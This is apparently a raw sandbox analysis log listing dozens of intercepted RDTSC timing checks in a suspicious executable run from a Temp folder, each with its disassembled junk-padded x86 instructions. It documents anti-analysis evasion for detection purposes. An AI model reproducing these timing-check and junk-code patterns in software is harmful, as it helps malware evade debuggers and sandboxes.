                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D5493 second address: 4D549D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D549D second address: 4D54A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D54A7 second address: 4D54B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D54B3 second address: 4D54D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F4C28D8B362h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD55 second address: 51CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C288D0386h 0x0000000a jnl 00007F4C288D0386h 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD66 second address: 51CD8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C28D8B360h 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD8D second address: 51CDA1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C288D0386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F4C288D0386h 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CDA1 second address: 51CDA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF2D second address: 51CF4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F4C288D0386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4C288D0395h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF4E second address: 51CF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF54 second address: 51CF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0397h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D249 second address: 51D24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D24F second address: 51D258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D61B second address: 51D66C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4C28D8B360h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F4C28D8B362h 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007F4C28D8B35Eh 0x0000001a push ecx 0x0000001b jmp 00007F4C28D8B35Fh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D66C second address: 51D670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D7EB second address: 51D7F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D7F5 second address: 51D7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520D5E second address: 520D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520D62 second address: 520DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2790B6CEh 0x00000010 movsx esi, ax 0x00000013 call 00007F4C288D0389h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4C288D0397h 0x0000001f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520DA6 second address: 520DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F4C28D8B35Ah 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 js 00007F4C28D8B35Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520DD9 second address: 520E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C288D038Ch 0x0000000a jp 00007F4C288D0386h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F4C288D0396h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007F4C288D038Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jno 00007F4C288D0386h 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5212A7 second address: 5212B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4C28D8B356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52196B second address: 52197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F4C288D0386h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5219FD second address: 521A4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F4C28D8B35Ah 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C28D8B358h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F4C28D8B369h 0x00000033 popad 0x00000034 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521A4D second address: 521A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521B7C second address: 521B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521C73 second address: 521C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4C288D0394h 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521D64 second address: 521D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FD4 second address: 521FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FD9 second address: 521FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B368h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FF5 second address: 52200C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a sub edi, 587B93ACh 0x00000010 pop esi 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52200C second address: 522016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 522016 second address: 52201A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525617 second address: 52561C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 527BE1 second address: 527BE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EEA second address: 525EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EEE second address: 525EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EF3 second address: 525EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 528C0F second address: 528C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4C288D0388h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, 0BD1h 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D22CCh] 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2486h], eax 0x00000038 xchg eax, ebx 0x00000039 jno 00007F4C288D038Ah 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F4C288D0386h 0x00000049 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529681 second address: 529695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4C28D8B35Ch 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529695 second address: 5296AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D0391h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5296AA second address: 52971E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C28D8B358h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, 7A163AAFh 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+12463680h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F4C28D8B358h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jbe 00007F4C28D8B35Ch 0x00000058 jo 00007F4C28D8B356h 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E933C second address: 4E934A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jnc 00007F4C288D0386h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D293 second address: 52D298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D298 second address: 52D307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0392h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f ja 00007F4C288D0386h 0x00000015 pop edi 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop esi 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F4C288D0388h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 sub dword ptr [ebp+122D316Ch], eax 0x0000003c push 00000000h 0x0000003e mov bx, ax 0x00000041 movzx edi, ax 0x00000044 push 00000000h 0x00000046 mov ebx, dword ptr [ebp+122D2B00h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C288D038Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E33B second address: 52E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E33F second address: 52E357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52F323 second address: 52F36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4C28D8B356h 0x00000009 jne 00007F4C28D8B356h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F4C28D8B35Ah 0x0000001a push 00000000h 0x0000001c mov edi, ecx 0x0000001e mov bx, 4300h 0x00000022 push 00000000h 0x00000024 cld 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jng 00007F4C28D8B35Ch 0x0000002d jns 00007F4C28D8B356h 0x00000033 push esi 0x00000034 jnp 00007F4C28D8B356h 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 530246 second address: 53024C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53024C second address: 530259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4C28D8B356h 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 530259 second address: 53025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5322D3 second address: 5322D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343AD second address: 5343B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343B1 second address: 5343B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343B5 second address: 5343C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F4C288D0388h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343C9 second address: 5343CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 536410 second address: 536414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 537348 second address: 5373D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F4C28D8B356h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F4C28D8B358h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2319h], ebx 0x0000002f push 00000000h 0x00000031 mov bx, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F4C28D8B358h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 pushad 0x00000051 adc di, 4582h 0x00000056 mov esi, 6185CEFBh 0x0000005b popad 0x0000005c or edi, dword ptr [ebp+122D1830h] 0x00000062 xchg eax, esi 0x00000063 jp 00007F4C28D8B35Eh 0x00000069 push eax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jo 00007F4C28D8B356h 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 539286 second address: 53928A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53928A second address: 5392AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53F71D second address: 53F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F4C288D0386h 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f jo 00007F4C288D038Eh 0x00000015 jnp 00007F4C288D0386h 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007F4C288D038Dh 0x00000023 push eax 0x00000024 pop eax 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4C288D0394h 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54110F second address: 541118 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 541118 second address: 54111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 548428 second address: 548445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B364h 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 548445 second address: 548454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E001 second address: 54E006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E006 second address: 54E00B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E00B second address: 54E01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a jc 00007F4C28D8B35Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E0F7 second address: 54E12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4C288D0386h 0x0000000a popad 0x0000000b push edi 0x0000000c jne 00007F4C288D0386h 0x00000012 pop edi 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jp 00007F4C288D0388h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4C288D0397h 0x00000026 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 54E12F second address: 54E133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
